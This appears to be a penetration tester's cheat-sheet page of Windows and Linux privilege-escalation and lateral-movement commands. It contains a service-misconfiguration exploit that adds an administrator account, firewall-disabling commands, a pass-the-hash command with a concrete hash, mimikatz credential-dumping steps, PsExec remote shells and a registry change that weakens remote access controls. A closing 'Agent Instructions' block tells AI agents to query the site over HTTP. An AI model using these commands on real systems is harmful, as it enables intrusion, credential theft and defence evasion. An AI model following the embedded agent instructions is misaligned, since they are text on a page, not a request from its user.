# keepnote

**file transfer;**

{% embed url="<https://blog.ropnop.com/transferring-files-from-kali-to-windows/>" %}

**Winpriv check:**

&#x20;<https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat>

**Local Privilege Escalation Abusing Misconfiguration Service (upnphost):**&#x20;

> accesschk.exe -uwcqv "Authenticated Users" */accepteula accesschk-xp.exe -uwcqv "Authenticated Users"* /accepteula
>
> accesschk.exe -ucqv upnphost\
> sc config upnphost depend= ""\
> sc config upnphost binpath= "net user testxlab Password1 /add" sc config upnphost binpath= "net localgroup Administrators testxlab /add"
>
> sc stop upnphost sc start upnphost

**File Transfer via FTP**

ftp > binary&#x20;

ftp> put /root/Downloads/accesschk.exe accesschk.exe

cadaver <http://10.11.1.14/>

**Python Interactive Shell**

pty spawn python3 -c 'import pty;pty.spawn("/bin/bash")'

python -c 'import pty;pty.spawn("/bin/bash")'&#x20;

**Disable Windows firewall on newer versions:**\
`NetSh Advfirewall set allprofiles state off`

**Disable windows firewall on older windows:**\
`netsh firewall set opmode disable`

**Referans**

priv esc linux - hacking articler (abuse path variable.) <https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/> <https://www.siberportal.org/red-team/linux-penetration-tests/linux-sizma-testlerinde-hak-yukseltme-yontemleri/>

priv esc - cronjob <https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/>

priv esc - windows - servisler - sc <https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/>

## PtH

`pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE //10.11.1.49 cmd.exe`

#### via sysinternals tools and mimikatz

* **PtH get user ntlm hash. (via RDP, MSF or other)**

```
mimikatz# privilege::debug 
mimikatz# privilege::minidump FILE.DMP 
mimikatz# sekurlsa::logonpasswords 
mimikatz# sekurlsa::pth /user:{USERNAME} /domain:{WORKGROUP or DOMAIN} /ntlm:{NTLM-HASH}
```

then open new cmd. you can run command via psexec.&#x20;

`windows> PsExec.exe \\{IP} cmd`

Tip: General usage with password:&#x20;

`PsExec.exe \\{IP} -u {DOMAIN\USERNAME} -p {PASSWORD} cmd`

if got "Couldn't access otherComputer: Access is denied." ERROR:

run the following command at target system:&#x20;

`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://security.musana.net/keepnote.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.